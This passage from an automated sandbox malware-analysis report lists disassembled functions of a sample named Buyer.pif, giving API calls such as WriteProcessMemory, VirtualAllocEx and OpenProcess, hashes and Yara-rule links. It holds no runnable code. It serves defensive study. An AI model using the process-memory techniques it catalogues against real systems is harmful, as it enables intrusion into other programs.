                                                                                                    • Instruction Fuzzy Hash: 17F049B9241309BBDB111FB59C4DF573BAEFF8A760F150416FA45C72A1CA70DC00AA60
                                                                                                    Function 00FB09E0 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00FB084E,?,00FB3A6B,?,00000001,00F83E59,?), ref: 00FB09F5
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00FB084E,?,00FB3A6B,?,00000001,00F83E59,?), ref: 00FB0A02
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00FB084E,?,00FB3A6B,?,00000001,00F83E59,?), ref: 00FB0A0F
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00FB084E,?,00FB3A6B,?,00000001,00F83E59,?), ref: 00FB0A1C
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00FB084E,?,00FB3A6B,?,00000001,00F83E59,?), ref: 00FB0A29
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00FB084E,?,00FB3A6B,?,00000001,00F83E59,?), ref: 00FB0A36
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: 020e896240fb0c0815454edde0a5e9f22f338d31c513706ff6ae6def39b6a259
                                                                                                    • Instruction ID: bf405f213012e349c6a713b8e9865e95ac126a53f0fe24d2dbc7728f33c463a4
                                                                                                    • Opcode Fuzzy Hash: 020e896240fb0c0815454edde0a5e9f22f338d31c513706ff6ae6def39b6a259
                                                                                                    • Instruction Fuzzy Hash: 1E019071801B169FCB30AF66D880457FBF9BF602253158E3ED19752931CBB0A984EE80
                                                                                                    Function 00FA633D Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00FA6351
                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FA6368
                                                                                                    • MessageBeep.USER32(00000000), ref: 00FA6380
                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00FA639C
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00FA63B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3741023627-0
                                                                                                    • Opcode ID: 63884253ac484b128505e1a430dfa9a80e4cb8262a43b7ee81d53e2cd3784b00
                                                                                                    • Instruction ID: af2dab90aadfcb9b80a64ccbd96027e2097db23856215fcf96499a9a07619324
                                                                                                    • Opcode Fuzzy Hash: 63884253ac484b128505e1a430dfa9a80e4cb8262a43b7ee81d53e2cd3784b00
                                                                                                    • Instruction Fuzzy Hash: 7101F471500308ABEF306B20DD4EB967BBDFF10701F04065AB582A11E0DBF5A945EB80
                                                                                                    Function 00F7DA8B Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00F7DAA3
                                                                                                      • Part of subcall function 00F72D18: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4), ref: 00F72D2E
                                                                                                      • Part of subcall function 00F72D18: GetLastError.KERNEL32(01011DB4,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4,01011DB4), ref: 00F72D40
                                                                                                    • _free.LIBCMT ref: 00F7DAB5
                                                                                                    • _free.LIBCMT ref: 00F7DAC7
                                                                                                    • _free.LIBCMT ref: 00F7DAD9
                                                                                                    • _free.LIBCMT ref: 00F7DAEB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 59a172b302d3b45a79ddc13dc93c27671aef04d725da22471d5074d9c05c9cfd
                                                                                                    • Instruction ID: 700938f535c01c4b3f7fb7430c6793eccfffa30821449f58446fd30bddbcf7cc
                                                                                                    • Opcode Fuzzy Hash: 59a172b302d3b45a79ddc13dc93c27671aef04d725da22471d5074d9c05c9cfd
                                                                                                    • Instruction Fuzzy Hash: FAF0F43294520667A671EB98F485C1677EDBE40760BE58807F44CD7905C62DFC806BB6
                                                                                                    Function 00F72560 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00F7257E
                                                                                                      • Part of subcall function 00F72D18: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4), ref: 00F72D2E
                                                                                                      • Part of subcall function 00F72D18: GetLastError.KERNEL32(01011DB4,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4,01011DB4), ref: 00F72D40
                                                                                                    • _free.LIBCMT ref: 00F72590
                                                                                                    • _free.LIBCMT ref: 00F725A3
                                                                                                    • _free.LIBCMT ref: 00F725B4
                                                                                                    • _free.LIBCMT ref: 00F725C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: e41c5cb5c4f40579cd5214d482b8d8715c62161e0b7c08e4c37c8b004fe42e43
                                                                                                    • Instruction ID: 066c79ea055f0db6e79a2d2a229536087e1ba0a9bb5d78aede9386abc235dbc3
                                                                                                    • Opcode Fuzzy Hash: e41c5cb5c4f40579cd5214d482b8d8715c62161e0b7c08e4c37c8b004fe42e43
                                                                                                    • Instruction Fuzzy Hash: 13F054708011129B9A76AFA4BC014983B61FB24760F26410BF48897699C73F0551AFD3
                                                                                                    Function 00F597FB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EndPath.GDI32(?), ref: 00F5980A
                                                                                                    • StrokeAndFillPath.GDI32(?,?,00F97807,00000000,?,?,?), ref: 00F59826
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00F59839
                                                                                                    • DeleteObject.GDI32 ref: 00F5984C
                                                                                                    • StrokePath.GDI32(?), ref: 00F59867
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                    • String ID:
                                                                                                    • API String ID: 2625713937-0
                                                                                                    • Opcode ID: a926bcaccf581b11452ca0838285556412579780e7157a7ca5cd95d8d872ce10
                                                                                                    • Instruction ID: b4e52aa7e557cfedef0ebc46c5c3f00f21356a2bb700fbedd2591a3466759f39
                                                                                                    • Opcode Fuzzy Hash: a926bcaccf581b11452ca0838285556412579780e7157a7ca5cd95d8d872ce10
                                                                                                    • Instruction Fuzzy Hash: 75F0193000660DEBDB295F29EC0C7687F66EB423B3F689215E9A5490F4C77A8895FF50
                                                                                                    Function 00F71207 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __freea$_free
                                                                                                    • String ID: a/p$am/pm
                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                    • Opcode ID: 5a0c28861740a5e98fd54a5627232e65fcc34cfd9c7c8dfd7e49c31092ad58d2
                                                                                                    • Instruction ID: b0e6f6179aacbb93be35392e43aee471018001c1100102472d2fd90463bd9b6f
                                                                                                    • Opcode Fuzzy Hash: 5a0c28861740a5e98fd54a5627232e65fcc34cfd9c7c8dfd7e49c31092ad58d2
                                                                                                    • Instruction Fuzzy Hash: 21D1E032D00206DADB289F6CCC45BBAB7B0FF15720F28C15BE909AB651D3359D48EB52
                                                                                                    Function 00FC8305 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F60592: EnterCriticalSection.KERNEL32(010116FC,?,?,?,00F4C0BA,01013560,01012408,00000001,00000000,CMDLINERAW,?,01012408,?,?,?,00000000), ref: 00F6059D
                                                                                                      • Part of subcall function 00F60592: LeaveCriticalSection.KERNEL32(010116FC,?,?,?,00F4C0BA,01013560,01012408,00000001,00000000,CMDLINERAW,?,01012408,?,?,?,00000000), ref: 00F605DA
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00F603F3: __onexit.LIBCMT ref: 00F603F9
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00FC8382
                                                                                                      • Part of subcall function 00F60548: EnterCriticalSection.KERNEL32(010116FC,?,?,00F4C0E8,01013560,00F82799,01012408,00000001,00000000,CMDLINERAW,?,01012408,?,?,?,00000000), ref: 00F60552
                                                                                                      • Part of subcall function 00F60548: LeaveCriticalSection.KERNEL32(010116FC,?,00F4C0E8,01013560,00F82799,01012408,00000001,00000000,CMDLINERAW,?,01012408,?,?,?,00000000), ref: 00F60585
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                    • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                    • API String ID: 535116098-3733170431
                                                                                                    • Opcode ID: 96464d3463df0a3c0553b7566a4dc424610fdf0c27a84f33620ca19a8eb5c6d7
                                                                                                    • Instruction ID: 81ca88440d5038c8a0c8017f4daadc1da818cd0ba7b8bc8afaa7cc66b6bdc876
                                                                                                    • Opcode Fuzzy Hash: 96464d3463df0a3c0553b7566a4dc424610fdf0c27a84f33620ca19a8eb5c6d7
                                                                                                    • Instruction Fuzzy Hash: 0991AF75A0020AEFCB14EF54C982EADB7B5FF04350F18844DF8069B291DB75AE46EB51
                                                                                                    Function 00FA2DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FABB04: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FA28B2,?,?,00000034,00000800,?,00000034), ref: 00FABB2E
                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FA2E42
                                                                                                      • Part of subcall function 00FABACF: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FA28E1,?,?,00000800,?,00001073,00000000,?,?), ref: 00FABAF9
                                                                                                      • Part of subcall function 00FABA2B: GetWindowThreadProcessId.USER32(?,?), ref: 00FABA56
                                                                                                      • Part of subcall function 00FABA2B: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FA2876,00000034,?,?,00001004,00000000,00000000), ref: 00FABA66
                                                                                                      • Part of subcall function 00FABA2B: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FA2876,00000034,?,?,00001004,00000000,00000000), ref: 00FABA7C
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FA2EAF
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FA2EFC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                    • String ID: @
                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                    • Opcode ID: ab13faa36b067a4b6487c91aa0594f66c0ef86e604a95c47cd517e4d476550e4
                                                                                                    • Instruction ID: 81f640a9033d074d3ebab92d95c0820b9ab11922ec546ba3a7df8b89a5a0350f
                                                                                                    • Opcode Fuzzy Hash: ab13faa36b067a4b6487c91aa0594f66c0ef86e604a95c47cd517e4d476550e4
                                                                                                    • Instruction Fuzzy Hash: D2415CB2A0021CAFDB10DFA4CD85ADEBBB8EF46300F004095FA45B7191DB756E85DBA0
                                                                                                    Function 00F719EE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\447331\Buyer.pif,00000104), ref: 00F71A29
                                                                                                    • _free.LIBCMT ref: 00F71AF4
                                                                                                    • _free.LIBCMT ref: 00F71AFE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                    • API String ID: 2506810119-939020992
                                                                                                    • Opcode ID: f02e0f5cac3d75d23b9151821d2cb157a79dbddf47895ece052ebb84ee637edc
                                                                                                    • Instruction ID: f73576d58320a008b3ab1a8df93a876a631811bb65c3d8a369812b03f6b819e0
                                                                                                    • Opcode Fuzzy Hash: f02e0f5cac3d75d23b9151821d2cb157a79dbddf47895ece052ebb84ee637edc
                                                                                                    • Instruction Fuzzy Hash: 89315071E41218AFEB21DF9D9C85D9EBBBCFF85310B208167E44897201D6788E45EB92
                                                                                                    Function 00FAC862 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00FAC8EB
                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00FAC931
                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,010129B0,01076358), ref: 00FAC97A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 135850232-4108050209
                                                                                                    • Opcode ID: 29b1feffd6cbec1abeb1bd49e066e7c61e5c45015a0d5a15087dddfe57e5d898
                                                                                                    • Instruction ID: 3a3f60ae0ebe5d405ce7012bc527ab25bc0ad59d303ba2837ddd47bf9b705c93
                                                                                                    • Opcode Fuzzy Hash: 29b1feffd6cbec1abeb1bd49e066e7c61e5c45015a0d5a15087dddfe57e5d898
                                                                                                    • Instruction Fuzzy Hash: 4741C0B16083019FD720DF24CC84F1BBBE8AF8A364F14461DF8A597291D734A905DBA6
                                                                                                    Function 00FD4BD6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00FDDC1C,00000000,?,?,?,?), ref: 00FD4C6A
                                                                                                    • GetWindowLongW.USER32 ref: 00FD4C87
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FD4C97
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long
                                                                                                    • String ID: SysTreeView32
                                                                                                    • API String ID: 847901565-1698111956
                                                                                                    • Opcode ID: eb23d08686224351ca632d18d34b90dd05a1793b385f749a813554249c417940
                                                                                                    • Instruction ID: 9349eaafdc05712f10834a20ff69dc93c8d38c25e3f607fbb7edcf161b0804a7
                                                                                                    • Opcode Fuzzy Hash: eb23d08686224351ca632d18d34b90dd05a1793b385f749a813554249c417940
                                                                                                    • Instruction Fuzzy Hash: 9231C231511609AFDB118F38CC45BEA7BAAEB04334F254716F979932D0D774EC51AB50
                                                                                                    Function 00FC37D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FC3AE2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00FC37FE,?,?), ref: 00FC3AFF
                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FC3801
                                                                                                    • _wcslen.LIBCMT ref: 00FC3822
                                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00FC388D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                    • String ID: 255.255.255.255
                                                                                                    • API String ID: 946324512-2422070025
                                                                                                    • Opcode ID: a583838d9a36d7ee6742bdbed8c82fe52bc2610cb2d5abf4d46b66b6e7f10236
                                                                                                    • Instruction ID: 6f9fd2f3f5c269dde00a534781f029b35cc60058b8dee995cf8da383229266a7
                                                                                                    • Opcode Fuzzy Hash: a583838d9a36d7ee6742bdbed8c82fe52bc2610cb2d5abf4d46b66b6e7f10236
                                                                                                    • Instruction Fuzzy Hash: 3531A036A00202DFCB10DF68C686F6977A1AF553A4F24C059F8168B7E2D735EE45EB60
                                                                                                    Function 00FD4676 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00FD46FE
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00FD4712
                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FD4736
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window
                                                                                                    • String ID: SysMonthCal32
                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                    • Opcode ID: acdf356654f0a76def62b26564f2d23c38f39bcdfb6b3503c0f71e8bd0ff5324
                                                                                                    • Instruction ID: 30a24bc2819776e1a2f1dca4e854eacdc38b4758deaed414fb7a236d792b0b23
                                                                                                    • Opcode Fuzzy Hash: acdf356654f0a76def62b26564f2d23c38f39bcdfb6b3503c0f71e8bd0ff5324
                                                                                                    • Instruction Fuzzy Hash: F8219F32500218ABDF118FA0CC42FEA3BAAFF49724F150215FA596B1D0D6B5F855AB90
                                                                                                    Function 00FD4E13 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00FD4EC5
